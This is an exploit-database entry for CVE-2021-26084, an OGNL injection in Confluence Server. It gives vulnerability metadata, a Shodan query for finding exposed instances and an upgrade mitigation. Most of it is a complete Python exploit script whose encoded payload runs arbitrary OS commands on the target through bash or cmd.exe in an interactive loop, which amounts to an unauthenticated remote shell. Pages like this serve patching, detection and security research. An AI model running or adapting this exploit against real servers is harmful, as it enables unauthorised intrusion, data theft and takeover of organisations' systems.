header-logo
Suggest Exploit
vendor:
Confluence Server
by:
h3v0x
9,8
CVSS
CRITICAL
OGNL injection
95
CWE
Product Name: Confluence Server
Affected Version From: All < 7.12.x versions before 7.12.5
Affected Version To: 7.12.5
Patch Exists: YES
Related CWE: CVE-2021-26084
CPE: a:atlassian:confluence_server
Metasploit: https://www.rapid7.com/db/vulnerabilities/atlassian-confluence-cve-2021-26084/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=153087https://www.infosecmatter.com/nessus-plugin-library/?id=152864https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/http/atlassian_confluence_webwork_ognl_injectionhttps://www.infosecmatter.com/nessus-plugin-library/?id=152139https://www.infosecmatter.com/nessus-plugin-library/?id=154244https://www.infosecmatter.com/nessus-plugin-library/?id=112036https://www.infosecmatter.com/nessus-plugin-library/?id=112219https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/http/atlassian_confluence_namespace_ognl_injectionhttps://www.infosecmatter.com/nessus-plugin-library/?id=138901https://www.infosecmatter.com/nessus-plugin-library/?id=112289
Tags: cve,cve2021,rce,confluence,injection,ognl,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://jira.atlassian.com/browse/CONFSERVER-67940https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084https://nvd.nist.gov/vuln/detail/CVE-2021-26084https://github.com/Udyz/CVE-2021-26084
Nuclei Metadata: {'max-request': 13, 'shodan-query': 'http.component:"Atlassian Confluence"', 'vendor': 'atlassian', 'product': 'confluence_data_center'}
Platforms Tested: Linux Distros
2021

Confluence Server 7.12.4 – ‘OGNL injection’ Remote Code Execution (RCE) (Unauthenticated)

Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.

Mitigation:

Upgrade to Confluence Server version 7.12.5 or later.
Source

Exploit-DB raw data:

# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)
# Date: 01/09/2021
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.12.x versions before 7.12.5
# Tested on: Linux Distros 
# CVE : CVE-2021-26084

#!/usr/bin/python3

# References: 
# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

import requests
from bs4 import BeautifulSoup
import optparse

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x")

options, args = parser.parse_args()
session = requests.Session()

url_vuln = options.url
endpoint = options.path

if not options.url or not options.path:

    print('[+] Specify an url target')
    print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
    print('[+] Example help usage: exploit.py -h')
    exit()


def banner():

    print('---------------------------------------------------------------')
    print('[-] Confluence Server Webwork OGNL injection')
    print('[-] CVE-2021-26084')
    print('[-] https://github.com/h3v0x')
    print('--------------------------------------------------------------- \n')


def cmdExec():

    while True:
        cmd = input('> ')
        xpl_url = url_vuln + endpoint
        xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate"}
        xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
        rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)

        soup = BeautifulSoup(rawHTML.text, 'html.parser')
        queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
        print(queryStringValue)


banner()
cmdExec()

Navigation

Suggest Exploit

Services By CQR